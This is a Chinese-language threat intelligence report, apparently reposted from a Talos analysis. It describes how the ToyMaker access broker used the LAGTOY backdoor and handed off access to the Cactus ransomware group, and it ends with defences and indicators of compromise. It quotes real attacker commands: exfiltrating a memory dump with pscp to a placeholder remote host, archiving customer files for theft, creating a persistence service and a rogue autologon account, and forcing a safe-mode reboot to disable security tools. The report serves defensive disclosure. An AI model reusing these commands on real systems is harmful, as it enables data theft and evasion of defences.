ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

admin 2025年6月5日03:20:45评论24 views字数 7395阅读24分39秒阅读模式
ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析


从初始入侵到双重勒索:ToyMaker与Cactus如何联手打造复杂攻击链
ToyMaker与Cactus联合攻击:复杂入侵链深度剖析


在当今复杂多变的网络威胁环境中,攻击者之间的合作愈发频繁,形成了更具破坏性的攻击链。2023年,思科Talos团队揭露了一起针对关键基础设施企业的联合攻击事件,攻击者通过精心策划的多阶段入侵,从初始访问逐步演变为双重勒索。本文将详细分析这一攻击链的各个环节,揭示攻击者如何利用多种工具和策略逐步渗透目标网络,最终实现其恶意目的。


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
一、背景

  • 2023年,思科Talos团队发现一家关键基础设施企业遭受了广泛的入侵,入侵者是一个由多种威胁行为者组成的联合体。
  • 从初始入侵到实施双重勒索,这些行为者通过结合使用各种具有双重用途的远程管理工具、SSH工具以及文件传输工具,缓慢而稳定地入侵了该企业网络中的众多主机。

  • 初始访问代理(IAB)被Talos称为“ToyMaker”,Talos对其评估的可信度为中等,这是一个以经济利益为动机的威胁行为者,他们利用暴露在互联网上的易受攻击的系统进行入侵。他们部署了我们称之为“LAGTOY”的定制后门,并从受害企业中窃取凭据。LAGTOY可以用来创建反向shell并在受感染的终端上执行命令。

  • 一旦被LAGTOY入侵,可能会导致访问权限被移交给第二个威胁行为者。具体来说,Talos团队观察到ToyMaker将访问权限移交给Cactus,这是一个双重勒索团伙,他们使用自己的战术、技术与程序(TTP)在受害者的网络中实施恶意行为。


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
二、从ToyMaker到Cactus的转变时间

通过对各个端点的入侵分析,Talos构建了一个从初始入侵到访问权限移交以及随后的二次恶意活动的时间线。以下是事件的高级时间线:

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
三、ToyMaker的TTP和工具

在初始入侵后,ToyMaker在一周内完成了初步侦查、凭据提取和后门部署,之后没有进一步活动。Talos没有观察到针对受害者的特定数据泄露,也没有发现试图发现和跳转到其他有价值端点的尝试。在大约三周的活动暂停后,Talos团队观察到Cactus勒索软件团伙利用ToyMaker窃取的凭据进入了受害企业。

基于相对较短的停留时间、缺乏数据盗窃以及随后移交给Cactus的情况,ToyMaker不太可能有任何间谍活动的意图或目标。

因此,Talos评估认为,ToyMaker是一个以经济利益为动机的初始访问代理(IAB),他们获取对高价值组织的访问权限,然后将这些访问权限移交给通常通过双重勒索和勒索软件部署来获利的二级威胁行为者。

ToyMaker和Cactus在战术、技术与程序(TTP)以及时间线上的差异要求这两种威胁需分别建模。然而,建立两者之间的关系至关重要。事实上,类似的联系需要纳入用于威胁建模的任何疑似IAB的范式中。在后续的博客中,Talos将提出一种新的方法来建模和跟踪这种既独立又相互关联的威胁。

ToyMaker被发现在使用一个被Talos追踪为LAGTOY后门的自定义恶意软件家族。ToyMaker通常通过成功利用未打补丁的互联网暴露服务器中的已知漏洞来渗透组织环境。成功入侵后,几乎立即会进行系统的快速侦查:

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

侦查完成后,行为者会在端点上创建一个名为“support”的虚假用户账户:

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

随后,攻击者使用Windows OpenSSH包(sshd.exe)在端点上启动一个SSH监听器。然后,端点从网络上的另一个受感染主机接收连接,该主机创建了一个名为“sftp-server.exe”的二进制文件,这是OpenSSHSFTP服务器模块。sftp-server.exe随后连接到远程主机以下载Magnet RAM Capture可执行文件:

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

Magnet RAM Capture是一个免费的取证工具,用于获取主机的内存转储,从中可以提取凭据。这种战术可能解释了Talos在此次活动中识别出的大量受感染系统的高数量。


然后使用7za.exe归档命令T1560对内存转储进行归档:

7za.exe a -p -mmt2 -mhe 1.7z 1.r
随后,使用PuTTY的SCP工具(pscp)将归档文件从端点泄露出去T1048:
pscp.exe -P 53 1.7z root@<Remote_IP>:/root

一旦攻击者获得内存转储,他们就会再次使用sftp-server.exe连接下载并执行我们称之为“LAGTOY”的定制反向shell植入。

LAGTOY通过创建一个服务来在系统上持久化[T1543][7]

sc create WmiPrvSV start=auto error=ignore binPath=C:Program FilesCommon FilesServicesWmiPrvSV.exe

植入程序会联系其中配置的C2服务器,以接收在端点上执行的命令,例如:


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
四、LAGTOY——ToyMaker的主要后门

LAGTOY是一种简单但有效的植入程序。该后门程序由Mandiant公司开发,名为HOLERUN。它旨在定期连接硬编码的C2服务器,并接受在受感染终端上执行的命令。它作为服务的一部分安装在系统上,并在发起与C2的连接之前进行基本的反调试检查。

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

注:LAGTOY执行逻辑


作为一种反调试技术,该恶意软件使用kernel32!SetUnhandledExceptionFilter()注册了一个自定义的未处理异常过滤器。如果该恶意软件在调试器下运行,则不会调用该自定义过滤器,异常将被传递给调试器。因此,如果注册了未处理异常过滤器并将控制权传递给该过滤器,则该进程不会在调试器下运行。


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析


LAGTOY旨在作为名为“WmiPrvSV”的服务在受感染的系统上运行。


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析


C2 IP地址和协议端口均已硬编码到LAGTOY中。通信通过443端口使用原始套接字进行,而非像预期的那样在此TCP端口上使用TLS


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

注:指挥和控制通信


C2会向LAGTOY发送特定的管理代码:

  • #pt:停止服务。

  • #pd:中断当前执行链并检查服务是否已停止。如果已停止,则等待特定时间后重新连接到C2

  • #ps:创建特定的进程/命令。

  • 如果代码不以#开头,则直接在端点上执行提供的命令或进程名称。


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

注:LAGTOY的命令识别逻辑


2022Mandiant发现的样本相比,此样本新增了#ps处理器,用于创建命令对应的进程。


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

注:2022年的样本没有#ps参数


基于时间的执行
ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
LAGTOY使用独特的基于时间的逻辑来决定是否需要执行命令或休眠一段时间。Talos高度确信,这种逻辑是LAGTOY系列植入体独有的创新定制逻辑。

LAGTOY能够处理来自C2的三个命令,每个命令之间的休眠间隔为11000毫秒。在其信标周期内,它会记录上次C2通信和命令执行的成功时间。如果C2发出的命令至少连续30分钟失败,植入体将向C2发送一条消息,告知其命令执行失败。


LAGTOY嵌入了一个看门狗程序。如果它累计运行时间超过60分钟,它将停止执行命令,然后检查服务是否已停止。如果服务仍然处于活动状态,植入体将重新启动与C2的连接。


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

注:LAGTOY的总体时间和C2通信逻辑


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
五、ToyMaker向勒索软件集团让步

在ToyMaker成功入侵受害企业近一个月后,该攻击者将访问权限转交给了二级威胁攻击者——Cactus勒索软件的关联公司,后者主要从事勒索软件和双重勒索操作。


Cactus团伙自行开展侦察和驻留,部署了一套自己的恶意软件,而不是使用LAGTOY作为入侵企业的载体。此外,他们最初使用ToyMaker先前通过Magnet RAM Capture工具获取的已泄露用户凭证访问了受感染的终端。

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
六、初步侦察和网络扫描

Cactus即开始进行网络扫描,以识别目标系统及其扩散情况。为了在网络中传播,他们首先运行了WSMAN发现脚本,枚举所有配置为处理PowerShell远程处理的端点。

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

在获取信息后,攻击者会清除其访问痕迹:

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
七、数据泄露

收集到的凭证使ToyMaker能够访问多个系统,威胁行为者在这些系统上执行侦察以获取有价值的信息。这些文件要么被存档,然后使用7zip和curl等多种双重用途工具进行提取,要么直接使用WinSCP等文件传输实用程序进行提取T1560,T1048:
C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p -xr!.ipa -xr!.apk -xr!.zip -xr!.rar -xr!.iso -xr!.dll -xr!.dl_ -xr!.lib -xr!.exe -xr!.ex_ -xr!.lnk -xr!.pdb -xr!.cab -xr!.msp -xr!.bak -xr!.old -xr!.bmp -xr!.gif -xr!.jpg -xr!.png -xr!.avi -xr!.m4v -xr!.mp4 -xr!.mp3 -xr!.wmv -xr!.wav -xr!.mov -xr!.mkv -xr!.log -xr!.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>

C:PerfLogsAdmin7z.exe a -t7z -mx0 -v4g -spf -scsUTF-8 -bsp1 -ssw -p<password> -xr!*.ipa -xr!*.apk -xr!*.zip -xr!*.rar -xr!*.iso -xr!*.dll -xr!*.dl_ -xr!*.lib -xr!*.exe -xr!*.ex_ -xr!*.lnk -xr!*.pdb -xr!*.cab -xr!*.msp -xr!*.bak -xr!*.old -xr!*.bmp -xr!*.gif -xr!*.jpg -xr!*.png -xr!*.avi -xr!*.m4v -xr!*.mp4 -xr!*.mp3 -xr!*.wmv -xr!*.wav -xr!*.mov -xr!*.mkv -xr!*.log -xr!*.csv -xr!*.jar -xr!test -xr!tests -xr!jdk8 e:tmp<filename>
在其他端点上,攻击者发现了并归档了被认为是受害者客户数据的文件,以便泄露[T1560[6],T1048[12]]:
C:Windowssystem32cmd.exe /c <path>7z.exe a -t7z -mx0 -ssp -spf -v5g -y -r -mhe=on <path>001.7z <path>Private FolderCustomers<path> -p<password>

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
八、远程工具的使用

Cactus团伙在不同端点上使用了多种远程管理工具以维持长期访问。这些工具包括:

  • eHorus Agent远程控制软件,也称为Pandora RC
  • AnyDesk远程桌面应用程序
  • Remote Utilities for Windows Admin (RMS Remote Admin)一款俄罗斯制造的远程管理工具/平台
  • OpenSSHWindows操作系统中包含的SSH软件包


这些远程管理工具通过PowerShellImpacket从攻击者控制的远程位置下载:


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析


在另一个案例中,攻击者通过OpenSSH创建了反向shell,创建了一个计划任务,每小时连接到C2服务器以接收并执行命令:


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析


Cactus勒索软件组织非常重视其运营安全。他们删除了包含用于窃取信息的SSH私钥的文件的访问权限。这阻止了受害者在正常情况下读取密钥。

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
九、新用户的创建


在某些端点上,恶意攻击者创建了未经授权的新用户账户,可能是为了便于部署勒索软件:
net user whiteninja <password> /add

reg add HKLMSOFTWAREMicrosoftWindows NTCurrentVersionWinlogon /v LegalNoticeText /t REG_SZ /d  /f

reg add HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon /v DefaultUserName /t REG_SZ /d whiteninja /f

reg add HKLMSoftwareMicrosoftWindows NTCurrentVersionWinlogon /v AutoLogonCount /t REG_DWORD /d 1 /f

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
十、滥用安全模式以逃避防御

在调查过程中,Talos发现攻击者执行了以下命令,将受感染的主机重启到安全模式:
bcdedit /set {default} safeboot minimal

shutdown -r -f -t 0
将系统启动到安全模式的动机可能是为了禁用安全产品,因为系统在这种模式下只加载最少的驱动程序和服务。一些安全产品在安全模式下可能处于非活动状态或功能受限,攻击者可以利用这一点修改注册表项或设置,以完全禁用安全产品T1562.001。


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
十一、Metasploit注入的二进制文件

Cactus团伙还广泛使用了注入了Metasploit shellcodeWindows二进制文件副本(如PuTTYApacheBench),这些文件用于在受感染的系统上执行代码。这些文件会通过端口5344383439232与托管便携式eHorus代理的同一远程服务器(51[.]81[.]42[.]234)通信。此外,Cactus还使用了由Metasploit生成的ELF二进制文件,这些文件也与同一远程C2服务器(51[.]81[.]42[.]234)通信。

 

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

注:Metasploit shellcode与远程服务器通信


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
十二、防护措

 

ToyMaker与Cactus联合攻击:复杂入侵链深度剖析


  • Cisco Secure Endpoint(原AMP for Endpoints非常适合阻止本文中提到的恶意软件的执行。

  • Cisco Secure Email(原思科邮件安全):可阻止威胁行为者在活动中发送的恶意邮件。

  • Cisco Secure Firewall(原Next-Generation FirewallFirepower NGFW:例如Threat Defense Virtual自适应安全设备Meraki MX等设备可以检测与该威胁相关的恶意活动。

  • Cisco Secure Network/Cloud AnalyticsStealthwatch/Stealthwatch Cloud:自动分析网络流量,并提醒用户连接设备上可能不需要的活动。

  • Cisco Secure Malware AnalyticsThreat Grid:识别恶意进制文件,并将保护功能集成到所有思科安全产品中。

  • Cisco Secure Access:基于零信任原则构建的现代云交付安全服务边缘(SSE)。

  • Umbrella(思科安全互联网网关):阻止用户连接到恶意域名、IPURL,无论用户是否在企业网络中。

  • Cisco Secure Web Appliance(原Web安全设备):自止潜在危险站点,并在用户访问之前测试可疑站点。

  • 防火墙管理中心提供针对特定环境和威胁数据的额外保护。

  • Cisco Duo为用户提供多因素身份验证,以确保只有授权用户才能访问网络。

  • Snort规则集:使用开放源代码的Snort订阅规则集的用户可以通过在Snort.org上购买最新规则包来保持更新。


ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
十三、威胁指标(IOCs)

(一)LAGTOY哈希值
ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
fdf977f0c20e7f42dd620db42d20c561208f85684d3c9efd12499a3549be3826

(二)Metasploit Shell哈希值
ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
0a367cc7e7e297248fad57e27f83316b7606788db9468f59031fed811cfe4867

0bcfea4983cfc2a55a8ac339384ecd0988a470af444ea8f3b597d5fe5f6067fb

5831b09c93f305e7d0a49d4936478fac3890b97e065141f82cda9a0d75b1066d

691cc4a12fbada29d093e57bd02ca372bc10968b706c95370daeee43054f06e3

70077fde6c5fc5e4d607c75ff5312cc2fdf61ea08cae75f162d30fa7475880de

a95930ff02a0d13e4dbe603a33175dc73c0286cd53ae4a141baf99ae664f4132

c1bd624e83382668939535d47082c0a6de1981ef2194bb4272b62ecc7be1ff6b


(三)网络IOCs
ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

ToyMaker

209[.]141[.]43[.]37

194[.]156[.]98[.]155

158[.]247[.]211[.]51

39[.]106[.]141[.]68

47[.]117[.]165[.]166

195[.]123[.]240[.]2

75[.]127[.]0[.]235

149[.]102[.]243[.]100

Cactus

206[.]188[.]196[.]20

51[.]81[.]42[.]234

178[.]175[.]134[.]52

162[.]33[.]177[.]56

64[.]52[.]80[.]252

162[.]33[.]178[.]196

103[.]199[.]16[.]92 
ToyMaker与Cactus联合攻击:复杂入侵链深度剖析
山石网科是中国网络安全行业的技术创新领导厂商,由一批知名网络安全技术骨干于2007年创立,并以首批网络安全企业的身份,于2019年9月登陆科创板(股票简称:山石网科,股票代码:688030)。
现阶段,山石网科掌握30项自主研发核心技术,申请560多项国内外专利。山石网科于2019年起,积极布局信创领域,致力于推动国内信息技术创新,并于2021年正式启动安全芯片战略。2023年进行自研ASIC安全芯片的技术研发,旨在通过自主创新,为用户提供更高效、更安全的网络安全保障。目前,山石网科已形成了具备“全息、量化、智能、协同”四大技术特点的涉及基础设施安全、云安全、数据安全、应用安全、安全运营、工业互联网安全、信息技术应用创新、安全服务、安全教育等九大类产品服务,50余个行业和场景的完整解决方案。
ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

原文始发于微信公众号(山石网科安全技术研究院):ToyMaker与Cactus联合攻击:复杂入侵链深度剖析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月5日03:20:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ToyMaker与Cactus联合攻击:复杂入侵链深度剖析https://cn-sec.com/archives/4133880.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息